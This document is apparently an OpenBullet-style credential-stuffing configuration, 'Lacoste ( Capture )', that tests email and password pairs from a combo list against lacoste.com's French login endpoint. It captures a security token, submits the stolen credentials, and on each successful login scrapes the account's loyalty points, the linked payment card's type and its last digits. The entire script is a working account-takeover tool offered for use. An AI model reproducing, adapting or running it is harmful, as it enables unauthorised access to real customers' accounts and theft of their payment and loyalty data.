[SETTINGS]
{
  "Name": "Lacoste ( Capture )",
  "SuggestedBots": 5,
  "LastModified": "2018-07-01T05:05:34.365116+00:00",
  "AdditionalInfo": "",
  "Author": "Marine",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_TOKEN REQUEST GET "https://www.lacoste.com/on/demandware.store/Sites-FR-Site/fr/LoginV2-Authenticate" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.lacoste.com/fr/account" 
  HEADER "origin: https://www.lacoste.com" 
#CAPTURE_TOKEN PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"dwfrm_login_securekey\" value=\"" "\"/>" Recursive=FALSE -> VAR "Token" "" "" 
#LOGIN REQUEST POST "https://www.lacoste.com/on/demandware.store/Sites-FR-Site/fr/LoginV2-Authenticate" AutoRedirect=TRUE 
  CONTENT "email=<USER>&password=<PASS>&isLoginPage=true&dwfrm_login_securekey=<Token>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Identifiants invalides" 
  KEYCHAIN Success OR 
    KEY "<title>Lacoste | Mon compte</title>" 
#GET_POINTS REQUEST GET "https://www.lacoste.com/on/demandware.store/Sites-FR-Site/fr/Fidelity-PendingLoyaltyEvent" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.lacoste.com/fr/account" 
  HEADER "origin: https://www.lacoste.com" 
#CAPTURE_POINTS PARSE "<SOURCE>" LR "<span class=\"text-decorate\">" "</span>" Recursive=FALSE -> CAP "Points" "" "" 
#GET_CC REQUEST GET "https://www.lacoste.com/fr/account" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.lacoste.com/fr/account" 
  HEADER "origin: https://www.lacoste.com" 
#CAPTURE_CC PARSE "<SOURCE>" LR "<img src=\"/on/demandware.static/Sites-FR-Site/-/fr/dw210386cc/img/" ".png\" alt=\"\" />" Recursive=FALSE -> CAP "Carte Liée" "" "" 
#CAPTURE_CC2 PARSE "<SOURCE>" LR "************" "<br />" Recursive=FALSE -> CAP "End CC" "************" "" 
